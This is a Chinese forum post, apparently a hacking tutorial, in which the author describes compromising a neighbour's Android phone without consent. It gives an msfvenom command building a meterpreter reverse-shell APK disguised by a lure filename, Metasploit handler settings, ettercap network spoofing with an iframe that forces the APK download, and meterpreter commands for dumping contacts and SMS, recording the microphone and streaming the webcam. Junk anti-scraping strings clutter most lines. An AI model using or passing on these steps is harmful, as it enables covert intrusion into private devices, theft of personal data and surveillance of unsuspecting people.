|
7 n. ?0 S6 O+ z% _; R% q- s
五、msf+ettercap入侵邻居安卓手机 % f4 y5 n6 j0 U
% `5 q [/ V1 X. W
/ G$ w W. E6 b; X9 v5 R$ o 首先启动msf
! \% P$ Z- K7 q- S; A* {8 G 0 e, ~/ w/ J9 A+ U) w0 u2 b
! r! p, B- L, d* I3 z* C) k9 H
先用kali生成一个安卓木马,如下命令:
* ~7 [% z; a( N8 I ] S6 V9 ~
9 {% Q ?0 a8 n/ g' G3 `4 `, M# V$ G, s! T4 |" E
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 7 R9 E8 d6 h" e5 H b0 a s4 }
4 Y$ Z* K( v M% J
7 W9 c/ V2 @6 Y8 q
 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 " k, h5 X) Y4 {& [ V- N
1 P Q3 B7 T' k: u, N# O
" l4 d# V# O* t! r2 ]+ Y6 T# S 然后进入msf
; u7 l5 |. h: T$ a& ~$ y 9 A7 F7 Q1 x( Z7 e0 p
' l$ g- N' X/ r [$ v% K use exploit/multi/handler
% @* P, C2 q' \0 q$ m2 y T, p: ]3 H( @0 `
: i4 S! [; z& l9 L set payload android/meterpreter/reverse_tcp " f6 n. D) z/ n3 M# Q: X4 v; o
1 t* r' B8 |$ T) t0 Y S) X9 ]/ E7 u* I1 p: \
set LHOST 192.168.0.109 //ip为kaili的ip
s9 i& l" ^+ Y5 T4 g3 a& A/ H ! L; B: T5 @1 ] B* M. b4 q
* l" G- i7 Q1 i& L; x6 d
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 c0 E2 h) p* h3 I
V9 f/ S$ g% p ~) d- ~! Z- |0 e2 T
: r( R- }# r3 \
Exploit
0 t( @9 H, b* D3 w4 n$ p
* P2 w$ _* u( J: \! N* B) x& m7 l( L
' O" P7 p1 {) \; m0 U- X( n
8 Q! G! j# K0 T x8 f5 i- w1 A+ Q6 w3 C& @) K2 V
下面我们开启ettercap -G + u& r8 b l: R
1 W% \" q' t4 g$ Z; ]7 o8 x9 v% S4 w
我物理IP为 " U% g& {4 A+ `
& F) m% L) ^, ]6 k) S- R9 g
1 P8 ?7 o: i: ~; t 
# y& k% j; Z, K
% V4 _. z1 V5 B7 X5 |% Q* B
, S" b8 u- i5 Z" _# g: i# X5 M R 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
' L9 s/ K' }/ p' B2 h; W ( h' H J& ~1 H; P( `. ~: r) V
) o# C2 s0 _1 M, p
下面我们来设置一下 + M$ e" b- U* w# ~, e5 {
/ o" p& _( {$ Q7 l
! w: ]" o9 Z% n" Q! m+ S  , \* n2 S" V' z; y" q+ Z% M+ n
! @/ u% B# o0 w/ R0 I3 h! W! u* s4 P. o! X$ D; F9 l% y% t$ {
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ; p& Z0 S C6 V
( B$ Q# m4 M" H/ w3 H5 g8 X) m0 `5 D0 A0 ~* x/ n2 ~
8 E% T2 j* E" q1 W # Y! G0 e- J1 M: i; Q5 n
! l0 [0 X# |8 C+ Y. Y* G# t
 , r5 B( J- ?) z# \( F
/ L+ i$ C- K" ~2 |' q* q0 Z4 ?0 @8 h! D+ t' Z: ^3 |
- J8 ~7 v; s6 Z% N9 c' J2 M
! g9 E( M: r' O/ Y# `$ {3 R& I8 L0 b- y9 }4 L1 y
* M8 h/ B5 O2 w( P- _2 n3 P, B
( Y/ T. q5 K4 V
) s' f2 Q R" g+ G$ ^, f
! c2 q4 m) B' q1 v( _1 H$ `
( r( p+ p5 x! q- t5 o3 W, F
\" B9 U1 R" S# a# Y) d E4 G/ L% Z5 t: R) x9 r* U( A( A
`* |* A3 s' P) L) N7 I
; u$ d- N* X. x, \3 I
2 w/ i1 l$ Y. ~# K* p4 e
# w8 _; e t/ B2 S( d6 a A9 k6 m6 W$ j* o9 H: Z" Q2 q
% X9 _! \6 {5 d, o6 ^0 D
p3 b& W% J6 H( k
, v' B6 _# |3 L
; b+ O: x4 {1 C( B3 | y. R. I* @
1 u2 {( ^/ n2 ~; H, U5 c2 q# Y" A' T: F \# X, Q& R, L
7 G- l W3 Q' {* F4 w/ k
$ |0 o7 q2 w3 p( p l3 w( k2 _9 V4 L+ e
: |! t3 |4 I; K! Q# e8 |+ J, | $ Z/ ] O8 q( O. f+ A6 t
0 q; p* O* O+ g3 w 1 V1 c8 s! Y, T; W# k5 t2 {* }
% {: y. \+ n( j% f6 _
. [3 C) @/ k; X ~ h 
R h2 r- _. u3 ]
0 C$ I+ k. k5 J- A5 C" o1 P+ d. \8 ~: m% J2 [# z
下面我们开始攻击 : H% w( b$ r8 O; A; D; p4 e; i
# D2 l. Y, x7 Y8 [ n& A, X
3 \1 [4 g1 a/ |4 v
, c' U! ?4 `& L+ q# I' a: ~0 s ) A) H0 \9 D$ {/ b) y! d1 h) h
( Z6 @8 P# h% ~
0 ^+ h2 ~5 x# X; m0 B+ i" B
2 i4 X7 B5 X. s4 f# G4 Z) W- V; e" P2 z. L1 U6 q
/ @5 C+ V- V8 q; T
: }8 r4 B, V: `! `' m- R
7 p8 ~& t! W. I5 `/ e % u" g; F R5 h, M5 J
' a+ ?; y" E" `3 j3 I# t+ g- @$ R
5 A# [1 [9 x; C6 C* p( l 
: w$ L" z) ^! ]# K+ P) \4 ?- B
$ Y; G/ h$ ?# q D5 ^" d; l3 W! E
( N4 ]: T% Z2 k5 H3 s' q 大概过了5分钟多,发现反弹成功了 3 `$ m+ P4 A% a/ H2 ^
L# Q( r% `0 |" {$ i- p
- ]+ R; z4 H6 v- s, c' ], X, v% |' E , R; j! x; Z2 D# J+ R; B2 V
3 W4 X9 }( H' K
7 i j( |' Z: V( H 5 A; G2 I/ d7 v$ F
6 s/ `' O2 ?2 D1 |- z$ g
1 P' H! Z% I" C: e z " y2 f( z# f' l- F9 k# f& @8 {
$ g1 V6 }8 s$ C
1 D. \" h# L; y) F' J1 |4 ^, ^
}9 a9 y) B& R8 j . v1 ~. R2 I- F/ W% H' \0 v
8 H% o2 D2 D R- q
; J& s4 E/ ?. w' x U3 F 1 L( ~9 b3 d' Q: i+ `4 j
& M9 l! q( _2 G4 ~- @ 2 R* R8 d1 y2 a8 z4 w9 j
9 N, i1 P& E2 ?8 J+ Y4 z; p' ?; n
2 r N* m0 T+ h
 2 S# l& u$ E" X& H
# m, N+ \1 M g6 S
* X9 t2 Y. R/ `5 V( k! T O 执行命令 : @( b3 E9 d9 \' i }' X; u( z
, v$ A. \: H; x
0 H* l/ n2 f& ?. Y
5 x' r4 A! A4 E: ~+ R ' h& Y- `# {( ^+ E" o( R" g
7 w6 h+ h* N7 W8 n dump_contacts --》这个是导出电话 & s* J* h% E/ h1 n: T" Z! O
* }) ]7 |/ o/ a( y) U: p. | |
; b4 s1 }% o1 x1 C' Z% ?9 Q dump_sms --》这个是导出信息 4 `& [: [: ^2 C0 x/ g+ w3 B$ i
) Z% s3 \/ h- \
3 ~4 G$ O9 n& R. z8 E& i record_mic Record audio from the default microphone for X seconds
; d( M1 @* i, r3 ]+ @/ z 4 W1 i7 \( B7 J" S- F1 ]$ G- _
% ?8 p) o8 z; p# O
webcam_chat Start a video chat
$ p# p* p- x% c- s
0 [4 }, r7 ]3 D8 M4 A
$ M P& Z! w# Z5 c3 [ webcam_list List webcams
9 o# z ^; x- S4 r" R* m
( C. `# M% H* X
" T; E2 q d/ Y webcam_snap Take a snapshot from the specified webcam
( a9 U1 ~: @3 d& K4 n) d5 Z
. J8 u1 g0 ~, j7 o4 W9 G
" \% {2 ?( C. j e webcam_stream  lay a video stream from the specified webcam ( l$ ?7 p: t6 d, y
]$ [: I- ]9 @, v$ X3 y, w5 n; i
+ w% ^: P# \2 z+ `( n2 N/ j  1 B) s2 h7 J, w
& {7 I( U/ L: E9 j! \/ D. U
+ w8 i1 R0 F6 H7 X' h  , ^5 B" ]7 L1 G
5 }$ l# f/ S% N' J1 _
) m; \& n9 W( n; { 我们打开看一下电话薄, ; S( L) z7 P! |
A/ R. B; G/ g/ U* z" k" @, }9 _* y- w
$ Z0 ? e4 I8 O ; m b1 R( E2 k* A+ u8 U" g) j
: V# U3 n. J$ o/ x5 k1 I1 l" f/ U
7 s8 s! ?$ y9 _ . R. Z$ G( ^; N. Q' V; n
. j. c2 y* r. F- U. y: [
0 c: g" [- M- U; y$ ~
1 s A; a0 }$ b7 _ q9 d$ q$ \. d& ^/ J/ P2 t
 " w! L O5 n# A! w5 g
5 H1 W+ q# s$ ?# l- K$ [* D
0 k2 M/ M2 w4 ]8 S3 `
7 _& |( T$ Y8 Z g. J: M ' [, U' h4 P) ?+ ]) `) z6 Z; T8 {
* ?5 Y* F$ g5 c
7 i! L- q' c# _! }
, x3 `. f7 g4 P: P0 t+ E5 c) C5 K' T4 A7 C- ]' ^# m
我们同时欺骗成DroidJack木马,使用方法如图: ' g7 g0 j, k& g, Y
5 q* y5 [0 K ]
5 u) K0 M6 }% `* D# K  " J4 }/ V. t" d( ~" g
$ n+ P; a# G z- w
8 J& O `& m* k, K
" L: g) |4 M! u" ]9 v. L, r 3 _( f7 w: j- Q1 p
' h5 k! R% `6 @. @1 J) H$ _% z# g. A$ O  # l9 P. U8 d1 q1 V" w) ?
" x/ F# ] t9 a# |% x
l/ N: W+ s" [4 X8 W 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 Y3 k l7 @7 Q- b3 b
4 n# U! H% [' ^6 m+ C- m
6 o& k3 o$ x+ I. F
+ y+ d+ p& z" [3 A# _ ( ^3 f5 V6 r# r+ r, k* r
( `/ {) @ O4 f" X! H O
5 W- d: x& A' {- {+ g n* H * x, B( a5 ?9 p3 U3 o# N W) M
}. q! X6 q* A) `: F: _  2 c/ U5 y. \- z# G
; F2 ]) s1 i) H. T4 f% u' w" h1 a; w# e, Y2 A. n
  # o; I* f3 J, F E4 c
( W8 D r/ t- J. V* x- D, j
. |' S; Y0 \* _9 q
: L1 h! Z# A) t ?# O5 O! P' H& b& s | 
发表于 2018-10-20 20:30:37
收藏
支持
反对